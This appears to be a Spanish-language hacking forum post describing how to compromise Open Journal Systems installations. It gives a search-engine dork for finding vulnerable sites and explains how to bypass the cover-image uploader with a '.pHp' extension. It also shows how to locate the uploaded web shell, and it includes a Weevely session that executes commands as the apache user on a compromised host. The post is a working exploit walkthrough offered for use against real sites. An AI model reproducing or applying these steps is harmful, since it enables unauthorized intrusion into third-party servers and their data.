bueno lo primero localizamos el sistema con la siguiente dork
Código:
inurl:public/journals/1/
Código:
https://example.com/blah/lo/que/sea
reader, author and reviewer...
creamos un artículo nuevo y usamos el uploader que hay para subir una portada para
nuestro articulo con extension pHp para bypassear el uploader o bien usamos live http headers
vamos a /public/journals/1/ y alli encontraremos nuestra shellcode renombrada a algo como:
cover_article_47_en_US.pHp
Voila!
PD: hasta la version 2.3.6 se puede hacer el upload con un submission en vez de con una portada, sinembargo esta suele estar parcheada.
https://www.htbridge.com/advisory/HTB23079
Código:
weevely http://mihost/public/journals/12/cover_article_21_en_US.pHp myshellpass
________ __
| | | |-----.----.-.--.----' |--.--.
| | | | -__| -__| | | -__| | | |
|________|_____|____|___/|____|__|___ | v1.0
|_____|
Stealth tiny web shell
[+] Welcome to Weevely. Browse filesystem and execute system commands.
[+] Use ':help' to list available modules and run selected one.
[shell.php] [!] Error: No response
apache@:/var/www/html/public/journals/12 $ id
uid=48(apache) gid=48(apache) grupos=48(apache),100(users)
apache@:/var/www/html/public/journals/12 $ uname
Linux
apache@:/var/www/html/public/journals/12 $
[!] Exiting. Bye ^^